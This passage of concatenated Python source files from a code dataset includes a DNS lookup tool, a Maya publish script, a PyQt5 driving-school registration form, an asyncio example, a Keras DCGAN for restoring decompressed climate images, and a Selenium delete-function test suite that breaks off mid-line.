bytes.append(len(part))\n for letter in part:\n bytes.append(ord(letter))\n bytes.append(0)\n\n return bytes\n\n\nclass Errors(Enum):\n \"\"\"An Enum representing the types of errors that may occur.\"\"\"\n SOCKET_ERROR = \"Unable to open TCP socket connection to {}\"\n HOSTNAME_ERROR = \"Hostname ({}) could not be resolved.\"\n HTTPS_ERROR = \"Could not connect to HTTPS address {}\"\n SEND_ERROR = \"Could not send data to open TCP socket\"\n DNS_ID_ERROR = \"DNS ID of response packet does not match request packet\"\n NON_RESPONSE_ERROR = \"Attempted to read a non-response packet\"\n NON_PTR = \"Attempted to add a non-pointer request to reverse lookup\"\n\n\ndef log_error(error, *parameters):\n \"\"\"\n Log that an error has occurred and exit the program.\n\n Args:\n error (Errors): The type of error that has occurred.\n *parameters (*): Any extra information relevant to the error.\n \"\"\"\n print(error.name, \":\", error.value.format(*parameters))\n sys.exit(1)\n\n\n@contextmanager\ndef open_socket(ip, port=80):\n \"\"\"\n Open a socket to an IP Address and a port.\n Automatically close connection using a context manager.\n\n Args:\n ip (str): The IP address with which a connection is opened.\n port (int): The port with which a connection is opened.\n\n Yields:\n (socket.socket): A socket connection to the given IP address.\n \"\"\"\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.connect((ip, port))\n yield sock\n sock.close()\n except socket.error:\n log_error(Errors.SOCKET_ERROR, ip)\n\n\ndef convert_binary(number, length=8):\n return [int(x) for x in '{0:0{1}b}'.format(number, length)]\n\n\ndef is_ip(string):\n parts = string.split(\".\")\n if len(parts) != 4:\n return False\n for part in parts:\n try:\n if int(part) >= 256:\n return False\n except ValueError:\n return False\n return True\n\n\ndef main():\n \"\"\"Main programmy thing, y'all know what it do\"\"\"\n parser = argparse.ArgumentParser(description=\"DNS Lookup Tool\")\n\n 
parser.add_argument(\"hostname\", type=str, action=\"store\",\n help=\"the hostname to lookup\")\n parser.add_argument(\"-d\", \"--dns-server\", dest=\"dns\", default=DNS_SERVER,\n help=\"the dns server to use to lookup the hostname\")\n parser.add_argument(\"-r\", \"--reverse\", dest=\"reverse\", action=\"store_true\",\n help=\"perform a reverse lookup\")\n\n args = parser.parse_args()\n\n packet = DNSReader(args.hostname, dns=args.dns, reverse=args.reverse)\n\n if args.reverse:\n packet.add_query(DomainType.PTR)\n else:\n packet.add_query(DomainType.A)\n packet.add_query(DomainType.AAAA)\n packet.add_query(DomainType.MX)\n packet.add_query(DomainType.CNAME)\n packet.add_query(DomainType.TXT)\n\n answers = packet.answers\n\n for type, answers in answers.items():\n print(type)\n for answer in answers:\n print(answer)\n print()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"example/python/dns/dns.py","file_name":"dns.py","file_ext":"py","file_size_in_byte":8171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"132949061","text":"# -*- coding: utf-8 -*-\nimport os\nimport optparse\nimport logging\nimport time\nimport maya.cmds as mc\nfrom miraLibs.pipeLibs import pipeFile\nfrom miraLibs.pipeLibs.backup import backup\nfrom miraLibs.pipeLibs.pipeDb import sql_api\nfrom miraLibs.pipeLibs.pipeMaya.network import delete_network\nfrom miraLibs.mayaLibs import open_file, quit_maya, save_as, remove_reference_by_group, load_plugin, new_file\nfrom miraLibs.pyLibs import create_parent_dir, copy\n\n\ndef main():\n logger = logging.getLogger(\"scenedetail publish\")\n new_file.new_file()\n load_plugin.load_plugin(\"mtoa.mll\")\n load_plugin.load_plugin(\"AbcImport.mll\")\n file_path = options.file\n open_file.open_file(file_path)\n # get paths\n obj = pipeFile.PathDetails.parse_path(file_path)\n project = obj.project\n seq = obj.seq\n shot = obj.shot\n publish_path = obj.publish_path\n # export gpu cache\n '''\n gpu_cache_path = pipeFile.get_shot_step_gpucache_file(seq, shot, \"sceneset\", project)\n create_parent_dir.create_parent_dir(gpu_cache_path)\n gpu_directory = os.path.dirname(gpu_cache_path)\n gpu_file_name = os.path.splitext(os.path.basename(gpu_cache_path))[0]\n logger.info(\"Exporting gpu cache...\")\n export_gpu_cache.export_gpu_cache(\"sceneset\", gpu_directory, gpu_file_name, 1, 1)\n logger.info(\"Export gpu cache to %s\" % gpu_cache_path)\n backup.backup(project, gpu_cache_path, False)\n '''\n # replace workarea v000\n workarea_file_path = file_path.replace(\"_QCPublish\", \"_workarea\")\n # backup.backup(project, workarea_file_path, False)\n copy.copy(file_path, workarea_file_path)\n logger.info(\"Cover %s\" % workarea_file_path)\n # add to database\n current_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n task_id = int(mc.getAttr(\"ROOT.task_id\"))\n db = sql_api.SqlApi(project)\n arg_dict = {'taskId': task_id, 'taskEndDate': current_time}\n db.releaseTask(arg_dict)\n logger.info(\"Add to data base.\")\n # save to publish path\n delete_network.delete_network()\n # remove camera reference\n remove_reference_by_group.remove_reference_by_group(\"camera\")\n remove_reference_by_group.remove_reference_by_group(\"_TEMP\")\n logger.info(\"remove camera and remove _TEMP\")\n # save to publish path\n create_parent_dir.create_parent_dir(publish_path)\n save_as.save_as(publish_path)\n logger.info(\"Save to %s\" % publish_path)\n backup.backup(project, publish_path, False)\n # quit maya\n quit_maya.quit_maya()\n\n\nif 
__name__ == \"__main__\":\n parser = optparse.OptionParser()\n parser.add_option(\"-f\", dest=\"file\", help=\"maya file ma or mb.\", metavar=\"string\")\n parser.add_option(\"-c\", dest=\"command\",\n help=\"Not a needed argument, just for mayabatch.exe, \" \\\n \"if missing this setting, optparse would \" \\\n \"encounter an error: \\\"no such option: -c\\\"\",\n metavar=\"string\")\n options, args = parser.parse_args()\n if len([i for i in [\"file_name\"] if i in dir()]) == 1:\n options.file = file_name\n main()\n","sub_path":"miraScripts/pipeTools/publish/scenedetail_publish.py","file_name":"scenedetail_publish.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"210150756","text":"from login import *\nfrom PyQt5.QtWidgets import QMessageBox\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Register(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(958, 760)\n MainWindow.setStyleSheet(\"background: white;\")\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(30, 200, 301, 61))\n self.label.setObjectName(\"label\")\n self.gender = QtWidgets.QComboBox(self.centralwidget)\n self.gender.setGeometry(QtCore.QRect(140, 470, 241, 41))\n self.gender.setObjectName(\"gender\")\n self.gender.addItem(\"\")\n self.gender.addItem(\"\")\n self.time = QtWidgets.QComboBox(self.centralwidget)\n self.time.setGeometry(QtCore.QRect(140, 550, 241, 41))\n self.time.setObjectName(\"time\")\n self.time.addItem(\"\")\n self.time.addItem(\"\")\n self.time.addItem(\"\")\n self.time.addItem(\"\")\n self.time.addItem(\"\")\n self.time.addItem(\"\")\n self.time.addItem(\"\")\n self.time.addItem(\"\")\n self.time.addItem(\"\")\n self.time.addItem(\"\")\n self.frame = QtWidgets.QFrame(self.centralwidget)\n self.frame.setGeometry(QtCore.QRect(720, 230, 211, 211))\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n self.label_8 = QtWidgets.QLabel(self.frame)\n self.label_8.setGeometry(QtCore.QRect(50, 80, 101, 31))\n self.label_8.setObjectName(\"label_8\")\n self.frame_2 = QtWidgets.QFrame(self.centralwidget)\n self.frame_2.setGeometry(QtCore.QRect(-130, 10, 1091, 171))\n self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_2.setObjectName(\"frame_2\")\n self.label_2 = QtWidgets.QLabel(self.frame_2)\n self.label_2.setGeometry(QtCore.QRect(700, 20, 371, 31))\n self.label_2.setObjectName(\"label_2\")\n self.label_3 = QtWidgets.QLabel(self.frame_2)\n self.label_3.setGeometry(QtCore.QRect(720, 50, 351, 21))\n self.label_3.setObjectName(\"label_3\")\n self.label_4 = QtWidgets.QLabel(self.frame_2)\n self.label_4.setGeometry(QtCore.QRect(730, 70, 341, 20))\n self.label_4.setObjectName(\"label_4\")\n self.label_5 = QtWidgets.QLabel(self.frame_2)\n self.label_5.setGeometry(QtCore.QRect(760, 90, 311, 20))\n self.label_5.setObjectName(\"label_5\")\n self.label_6 = QtWidgets.QLabel(self.frame_2)\n self.label_6.setGeometry(QtCore.QRect(760, 110, 311, 20))\n self.label_6.setObjectName(\"label_6\")\n self.label_15 = QtWidgets.QLabel(self.frame_2)\n self.label_15.setGeometry(QtCore.QRect(140, 10, 351, 151))\n self.label_15.setText(\"\")\n 
self.label_15.setPixmap(QtGui.QPixmap(\"Screenshot from 2020-01-28 13-55-45.png\"))\n self.label_15.setScaledContents(False)\n self.label_15.setObjectName(\"label_15\")\n self.label_7 = QtWidgets.QLabel(self.centralwidget)\n self.label_7.setGeometry(QtCore.QRect(430, 210, 61, 61))\n self.label_7.setObjectName(\"label_7\")\n self.label_9 = QtWidgets.QLabel(self.centralwidget)\n self.label_9.setGeometry(QtCore.QRect(10, 310, 111, 51))\n self.label_9.setObjectName(\"label_9\")\n self.name = QtWidgets.QLineEdit(self.centralwidget)\n self.name.setGeometry(QtCore.QRect(140, 310, 411, 51))\n self.name.setStyleSheet(\"font: bold;\\n\"\n\"font-size: 20px;\\n\"\n\"\")\n self.name.setText(\"\")\n self.name.setObjectName(\"name\")\n self.label_10 = QtWidgets.QLabel(self.centralwidget)\n self.label_10.setGeometry(QtCore.QRect(10, 390, 111, 51))\n self.label_10.setObjectName(\"label_10\")\n self.address = QtWidgets.QLineEdit(self.centralwidget)\n self.address.setGeometry(QtCore.QRect(140, 390, 411, 51))\n self.address.setStyleSheet(\"\\n\"\n\"font: bold;\\n\"\n\"font-size: 20px;\\n\"\n\"\")\n self.address.setObjectName(\"address\")\n self.label_11 = QtWidgets.QLabel(self.centralwidget)\n self.label_11.setGeometry(QtCore.QRect(10, 470, 121, 41))\n self.label_11.setObjectName(\"label_11\")\n self.label_12 = QtWidgets.QLabel(self.centralwidget)\n self.label_12.setGeometry(QtCore.QRect(10, 550, 81, 41))\n self.label_12.setObjectName(\"label_12\")\n self.label_13 = QtWidgets.QLabel(self.centralwidget)\n self.label_13.setGeometry(QtCore.QRect(440, 550, 131, 41))\n self.label_13.setObjectName(\"label_13\")\n self.label_14 = QtWidgets.QLabel(self.centralwidget)\n self.label_14.setGeometry(QtCore.QRect(430, 470, 211, 41))\n self.label_14.setObjectName(\"label_14\")\n self.status = QtWidgets.QComboBox(self.centralwidget)\n self.status.setGeometry(QtCore.QRect(640, 470, 241, 41))\n self.status.setStyleSheet(\"\")\n self.status.setObjectName(\"status\")\n self.status.addItem(\"\")\n self.status.addItem(\"\")\n self.duration = QtWidgets.QComboBox(self.centralwidget)\n self.duration.setGeometry(QtCore.QRect(640, 550, 241, 41))\n self.duration.setObjectName(\"duration\")\n self.duration.addItem(\"\")\n self.duration.addItem(\"\")\n self.duration.addItem(\"\")\n self.duration.addItem(\"\")\n self.save = QtWidgets.QPushButton(self.centralwidget)\n self.save.setGeometry(QtCore.QRect(310, 660, 291, 51))\n self.save.setStyleSheet(\"font: bold;\\n\"\n\"font-size: 20px;\\n\"\n\"color: black;\\n\"\n\"background-color: white;\")\n self.save.setObjectName(\"save\")\n \n ####\n \n self.save.clicked.connect(self.popup)\n ####\n self.exit = QtWidgets.QPushButton(self.centralwidget)\n self.exit.setGeometry(QtCore.QRect(810, 670, 141, 41))\n self.exit.setStyleSheet(\"font: bold;\\n\"\n\"font-size: 20px;\\n\"\n\"color: black;\")\n icon = QtGui.QIcon.fromTheme(\"exit\")\n self.exit.setIcon(icon)\n self.exit.setObjectName(\"exit\")\n \n ###\n self.exit.clicked.connect(self.exits)\n ###\n self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.lineEdit.setGeometry(QtCore.QRect(510, 220, 201, 41))\n self.lineEdit.setObjectName(\"lineEdit\")\n self.line = QtWidgets.QFrame(self.centralwidget)\n self.line.setGeometry(QtCore.QRect(30, 240, 281, 16))\n self.line.setFrameShape(QtWidgets.QFrame.HLine)\n self.line.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.line.setObjectName(\"line\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 958, 
22))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n self.actionADMIN = QtWidgets.QAction(MainWindow)\n self.actionADMIN.setObjectName(\"actionADMIN\")\n self.actionREGISTERED_STUDENTS = QtWidgets.QAction(MainWindow)\n self.actionREGISTERED_STUDENTS.setObjectName(\"actionREGISTERED_STUDENTS\")\n self.actionSTATISTICS = QtWidgets.QAction(MainWindow)\n self.actionSTATISTICS.setObjectName(\"actionSTATISTICS\")\n self.actionLOGOUT = QtWidgets.QAction(MainWindow)\n self.actionLOGOUT.setObjectName(\"actionLOGOUT\")\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n###############################################################################################################################\n\n def enterData(self):\n name = self.name.text()\n address = self.address.text()\n gender = self.gender.currentText()\n time = self.time.currentText()\n status = self.status.currentText()\n duration = self.duration.currentText()\n date = self.lineEdit.text()\n\n conn = sqlite3.connect(\"midway.db\")\n cur = conn.cursor()\n\n cur.execute(\"INSERT INTO registration VALUES(?,?,?,?,?,?,?)\",(name,address,gender,status,duration,time,date))\n\n conn.commit()\n\n conn.close()\n\n##############################################################################################################################\n def popup(self):\n self.enterData()\n msg = QMessageBox()\n msg.setWindowTitle(\"Alert\")\n msg.setText(\"New Student Registered Successfully!\")\n msg.setIcon(QMessageBox.Information)\n \n x = msg.exec_()\n \n def exits(self):\n exit()\n \n \n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MIDWAY DRIVING SCHOOL 2020\"))\n self.label.setText(_translate(\"MainWindow\", \"
REGISTRATION FORM\"))\n self.gender.setItemText(0, _translate(\"MainWindow\", \"MALE\"))\n self.gender.setItemText(1, _translate(\"MainWindow\", \"FEMALE\"))\n self.time.setItemText(0, _translate(\"MainWindow\", \"9AM\"))\n self.time.setItemText(1, _translate(\"MainWindow\", \"10AM\"))\n self.time.setItemText(2, _translate(\"MainWindow\", \"11AM\"))\n self.time.setItemText(3, _translate(\"MainWindow\", \"12PM\"))\n self.time.setItemText(4, _translate(\"MainWindow\", \"1PM\"))\n self.time.setItemText(5, _translate(\"MainWindow\", \"2PM\"))\n self.time.setItemText(6, _translate(\"MainWindow\", \"3PM\"))\n self.time.setItemText(7, _translate(\"MainWindow\", \"4PM\"))\n self.time.setItemText(8, _translate(\"MainWindow\", \"5PM\"))\n self.time.setItemText(9, _translate(\"MainWindow\", \"6PM\"))\n self.label_8.setText(_translate(\"MainWindow\", \"PHOTO\"))\n self.label_2.setText(_translate(\"MainWindow\", \"MIDWAY DRIVING SCHOOL\"))\n self.label_3.setText(_translate(\"MainWindow\", \"Address: Manjai, The Gambia\"))\n self.label_4.setText(_translate(\"MainWindow\", \"Tel: (+220 ) 3918800 / 793 3540\"))\n self.label_5.setText(_translate(\"MainWindow\", \"Facebook: midwaydrivingschool gambia\"))\n self.label_6.setText(_translate(\"MainWindow\", \"E-mail: midwaydrivingschool3@gmail.com\"))\n self.label_7.setText(_translate(\"MainWindow\", \"Date\"))\n self.label_9.setText(_translate(\"MainWindow\", \"Name\"))\n self.label_10.setText(_translate(\"MainWindow\", \"Address\"))\n self.label_11.setText(_translate(\"MainWindow\", \"Gender\"))\n self.label_12.setText(_translate(\"MainWindow\", \"Time\"))\n self.label_13.setText(_translate(\"MainWindow\", \"Duration\"))\n self.label_14.setText(_translate(\"MainWindow\", \"Marital Status
\"))\n self.status.setItemText(0, _translate(\"MainWindow\", \"SINGLE\"))\n self.status.setItemText(1, _translate(\"MainWindow\", \"MARRIED\"))\n self.duration.setItemText(0, _translate(\"MainWindow\", \"ONE WEEKS\"))\n self.duration.setItemText(1, _translate(\"MainWindow\", \"TWO WEEKS\"))\n self.duration.setItemText(2, _translate(\"MainWindow\", \"THREE WEEKS\"))\n self.duration.setItemText(3, _translate(\"MainWindow\", \"ONE MONTH\"))\n self.save.setText(_translate(\"MainWindow\", \"REGISTER NEW STUDENT\"))\n self.exit.setText(_translate(\"MainWindow\", \"QUIT\"))\n self.lineEdit.setPlaceholderText(_translate(\"MainWindow\", \"10/feb/2020\"))\n self.actionADMIN.setText(_translate(\"MainWindow\", \"ADMIN\"))\n self.actionREGISTERED_STUDENTS.setText(_translate(\"MainWindow\", \"REGISTERED STUDENTS\"))\n self.actionSTATISTICS.setText(_translate(\"MainWindow\", \"STATISTICS\"))\n self.actionLOGOUT.setText(_translate(\"MainWindow\", \"LOGOUT\"))\n\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Register()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n","sub_path":"register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":13508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"379680478","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport asyncio\n\n\n@asyncio.coroutine\ndef phase(i):\n print(\"in phase {}\".format(i))\n yield from asyncio.sleep(0.5 - (0.1 * i))\n print(\"done with phase {}\".format(i))\n return \"phase {} result\".format(i)\n\n\n@asyncio.coroutine\ndef entry(num_phases):\n print(\"starting entry\")\n phases = [\n phase(i)\n for i in range(num_phases)\n ]\n print(\"waiting for phases to complete\")\n results = []\n for next_to_complete in asyncio.as_completed(phases):\n answer = yield from next_to_complete\n print(\"received answer {!r}\".format(answer))\n results.append(answer)\n print(\"results: {!r}\".format(results))\n return results\n\n\ndef main():\n event_loop = asyncio.get_event_loop()\n try:\n event_loop.run_until_complete(entry(3))\n finally:\n event_loop.close()\n\n\nif __name__ == '__main__':\n main()","sub_path":"standard/050.asyncio/control_structures/asyncio_as_completed.py","file_name":"asyncio_as_completed.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"349890850","text":"# Just for centralizing 'graphics'\n\nWHITE_PAWN = '♙'\nWHITE_KNIGHT = '♘'\nWHITE_BISHOP = '♗'\nWHITE_ROOK = '♖'\nWHITE_QUEEN = '♕'\nWHITE_KING = '♔'\n\nBLACK_PAWN = '♟'\nBLACK_KNIGHT = '♞'\nBLACK_BISHOP = '♝'\nBLACK_ROOK = '♜'\nBLACK_QUEEN = '♛'\nBLACK_KING = '♚'\n\nEMPTY_TILE = '⭘'\nSPACE = ' '\n\n'''\n♜\t♞\t♝\t♛\t♚\t♝\t♞\t♜\n♟\t♟\t♟\t♟\t♟\t♟\t♟\t♟\n\n♙\t♙\t♙\t♙\t♙\t♙\t♙\t♙\n♖\t♘\t♗\t♕\t♔\t♗\t♘\t♖\n'''","sub_path":"minichess/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"136910530","text":"from __future__ import print_function, division\n\nfrom keras.datasets import mnist\nfrom keras.layers import Input, Dense, Reshape, Flatten, Dropout\nfrom keras.layers import BatchNormalization, Activation, ZeroPadding2D\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.layers.convolutional import UpSampling2D, Conv2D\nfrom keras.models import Sequential, 
Model\nfrom keras.optimizers import Adam\n\nimport matplotlib.pyplot as plt\n\nimport sys\n\nimport numpy as np\nfrom datasets import * \nclass DCGAN():\n def __init__(self):\n # Input shape\n self.img_rows = 64\n self.img_cols = 64\n self.channels = 1\n self.img_shape = (self.img_rows, self.img_cols, self.channels)\n self.latent_dim = 128\n\n optimizer = Adam(0.0002, 0.5)\n\n # Build and compile the discriminator\n self.discriminator = self.build_discriminator()\n self.discriminator.compile(loss='binary_crossentropy',\n optimizer=optimizer,\n metrics=['accuracy'])\n\n # Build the generator\n self.generator = self.build_generator()\n\n # The generator takes noise as input and generates imgs\n decomp_img = Input(shape=self.img_shape)\n recov_img = self.generator(decomp_img)\n\n # For the combined model we will only train the generator\n self.discriminator.trainable = False\n\n # The discriminator takes generated images as input and determines validity\n valid = self.discriminator(recov_img)\n\n # The combined model (stacked generator and discriminator)\n # Trains the generator to fool the discriminator\n self.combined = Model(decomp_img, valid)\n self.combined.compile(loss='binary_crossentropy', optimizer=optimizer)\n\n def build_generator(self):\n\n model = Sequential()\n \n model.add(Conv2D(32, kernel_size=3, strides=2, input_shape=self.img_shape, padding=\"same\"))\n #model.add(ZeroPadding2D(padding=((0,1),(0,1))))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(0.25))\n model.add(Conv2D(64, kernel_size=3, strides=2, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(0.25))\n model.add(Conv2D(128, kernel_size=3, strides=2, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(0.25))\n model.add(Conv2D(256, kernel_size=3, strides=2, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(0.25))\n #model.add(Flatten())\n\n\n #model.add(Dense(128 * 2 * 2, activation=\"relu\", input_dim=self.latent_dim))\n #model.add(Reshape((2, 2, 128)))\n\n model.add(UpSampling2D())\n model.add(Conv2D(256, kernel_size=3, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Activation(\"relu\"))\n\n model.add(UpSampling2D())\n model.add(Conv2D(128, kernel_size=3, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Activation(\"relu\"))\n\n model.add(UpSampling2D())\n model.add(Conv2D(64, kernel_size=3, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Activation(\"relu\"))\n\n model.add(UpSampling2D())\n model.add(Conv2D(32, kernel_size=3, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Activation(\"relu\"))\n\n model.add(Conv2D(self.channels, kernel_size=3, padding=\"same\"))\n model.add(Activation(\"tanh\"))\n\n model.summary()\n\n decomp_img = Input(shape=self.img_shape)\n recov_img = model(decomp_img)\n\n return Model(decomp_img, recov_img)\n\n def build_discriminator(self):\n\n model = Sequential()\n\n model.add(Conv2D(32, kernel_size=3, strides=2, input_shape=self.img_shape, padding=\"same\"))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(0.25))\n model.add(Conv2D(64, kernel_size=3, strides=2, padding=\"same\"))\n #model.add(ZeroPadding2D(padding=((0,1),(0,1))))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(0.25))\n model.add(Conv2D(128, 
kernel_size=3, strides=2, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(0.25))\n model.add(Conv2D(256, kernel_size=3, strides=1, padding=\"same\"))\n model.add(BatchNormalization(momentum=0.8))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Dropout(0.25))\n model.add(Flatten())\n model.add(Dense(1, activation='sigmoid'))\n\n model.summary()\n\n img = Input(shape=self.img_shape)\n validity = model(img)\n\n return Model(img, validity)\n\n def train(self, epochs, batch_size=128, save_interval=50):\n\n orig_train=load_CLDHGH_orig(path=\"/home/jliu447/lossycompression/multisnapshot-data-cleaned/CLDHGH/\",size=64,endnum=50)\n decomp_train=load_CLDHGH_decomp(path=\"/home/jliu447/lossycompression/multisnapshot-data-cleaned/CLDHGH_SZ/\",size=64,endnum=50)\n \n # Adversarial ground truths\n valid = np.ones((batch_size, 1))\n fake = np.zeros((batch_size, 1))\n\n for epoch in range(epochs):\n\n \n # ---------------------\n # Train Discriminator\n # ---------------------\n\n # Select a random batch of images\n idx = np.random.randint(0, orig_train.shape[0], batch_size)\n orig_imgs = orig_train[idx]\n orig_imgs = np.expand_dims(orig_imgs, axis=3)\n decomp_imgs=decomp_train[idx]\n decomp_imgs = np.expand_dims(decomp_imgs, axis=3)\n # Sample noise as generator input\n #noise = np.random.normal(0, 1, (batch_size, self.latent_dim))\n\n # Generate a batch of new images\n recov_imgs = self.generator.predict(decomp_imgs)\n\n # Train the critic\n d_loss_real = self.discriminator.train_on_batch(orig_imgs, valid)\n d_loss_fake = self.discriminator.train_on_batch(recov_imgs, fake)\n d_loss = 0.5 * np.add(d_loss_fake, d_loss_real)\n\n # Clip critic weights\n '''\n for l in self.discriminator.layers:\n weights = l.get_weights()\n weights = [np.clip(w, -self.clip_value, self.clip_value) for w in weights]\n l.set_weights(weights)\n '''\n\n # ---------------------\n # Train Generator\n # ---------------------\n\n g_loss = self.combined.train_on_batch(decomp_imgs, valid)\n\n # Plot the progress\n print (\"%d [D loss: %f, acc.: %.2f%%] [G loss: %f]\" % (epoch, d_loss[0], 100*d_loss[1], g_loss))\n # If at save interval => save generated image samples\n if epoch % save_interval == 0:\n self.generator.save(\"generator.h5\")\n\n \n\n\n\n\nif __name__ == '__main__':\n dcgan = DCGAN()\n dcgan.train(epochs=200000, batch_size=32, save_interval=1000)\n","sub_path":"dcgan/dcgan.py","file_name":"dcgan.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"373494127","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/2/7 11:52\n# @Author : QiWei.Ren\nimport unittest,time,re\nfrom selenium import webdriver\nfrom CINTEL_FZWEB3_1_2_1.common.mysql import *\nfrom CINTEL_FZWEB3_1_2_1.common.getfile_data_time_levelup import *\nfrom CINTEL_FZWEB3_1_2_1.logger.log import *\n\"\"\"\nDelete with nothing selected\nDelete a single selected row\nDelete multiple selected rows\n\"\"\"\nlog=Log()\nclass Set_code(unittest.TestCase):\n def setUp(self):\n log.info(\"Opening browser\")\n url = \"http://192.168.2.87:8080/rg_web/index.shtml\"\n self.driver = webdriver.Chrome()\n self.driver.implicitly_wait(30)\n self.driver.maximize_window()\n self.driver.get(url)\n\n def tearDown(self):\n log.info(\"Closing browser\")\n self.driver.quit()\n\n def del_t(self):\n driver=self.driver\n self.driver.find_element_by_id(\"login_name\").send_keys(\"itim\")\n self.driver.find_element_by_id(\"password\").send_keys(\"itim204\")\n self.driver.find_element_by_xpath(\"//*[@id='vcode']\").send_keys(\"8888\")\n self.driver.find_element_by_xpath(\"//div[@onclick='loginSubmit()']\").click()\n self.driver.implicitly_wait(30)\n log.info(\"User %s logged in successfully\" % self.driver.find_element_by_class_name(\"protel\").text[1:10])\n click_btn = self.driver.find_elements_by_class_name(\"desktop-app\")[47]\n from selenium.webdriver.common.action_chains import ActionChains\n action=ActionChains(driver)\n write=self.driver.find_element_by_xpath(\"/html/body/div[1]/div[3]/div[1]/div[6]/fieldset/legend\")\n action.move_to_element(write).perform()\n click_btn.click()\n self.driver.implicitly_wait(30)\n log.info(self.driver.find_element_by_class_name(\"layui-layer-title\").text)\n self.driver.switch_to_frame(self.driver.find_element_by_tag_name(\"iframe\"))\n\n def test_del_empty(self):\n log.info(\"Running the delete-with-no-selection test\")\n self.del_t()\n driver=self.driver\n\n driver.find_element_by_xpath(\"/html/body/div[1]/div[1]/div[1]/div/button[3]/i\").click()\n time.sleep(1)\n fact_name = driver.find_element_by_class_name(\"layui-layer-content\").text\n log.debug(fact_name)\n expect_name=\"请选择要删除的行\"\n self.assertEqual(fact_name,expect_name)\n\n\n def test_del_onedel(self):\n log.info(\"Running the single-row delete test\")\n self.del_t()\n driver = self.driver\n\n driver.find_element_by_xpath(\n \"/html/body/div[1]/div[2]/div/div/div/div/div[3]/div[2]/table/tbody/tr[1]/td[1]/div/div/i\").click()\n text=driver.find_element_by_xpath(\"/html/body/div[1]/div[2]/div/div/div/div\").text.split(\"修改时间\")[1]\n\n driver.find_element_by_xpath(\"/html/body/div[1]/div[1]/div[1]/div/button[3]/i\").click()\n time.sleep(1)\n self.driver.find_element_by_class_name(\"layui-layer-btn0\").click()\n time.sleep(0.5)\n fact_name = driver.find_element_by_class_name(\"layui-layer-content\").text\n log.debug(fact_name)\n expect_name = \"删除成功\"\n num = re.findall(r\"\\d+\\.?\\d*\", text)[0]\n Mysql.dbconfig = {\n 'host': '192.168.2.87',\n 'port': 3306,\n 'db': 'rg_web3_1',\n 'user': 'root',\n 'passwd': '123456',\n 'charset': 'utf8'\n }\n db = Mysql(Mysql.dbconfig)\n fact = db.select(table=\"t_setcode\", colume='set_code', condition='set_code=\"%s\"' %num)\n if fact:\n print(\"setcode: {}\".format(fact), \"delete failed\")\n else:\n print(\"setcode: {}\".format(num), \"delete succeeded\")\n db.close()\n self.assertEqual(fact_name, expect_name)\n\n def test_del_moredel(self):\n self.del_t()\n driver = self.driver\n log.warning(\"checkbox: %s\" % driver.find_element_by_xpath( 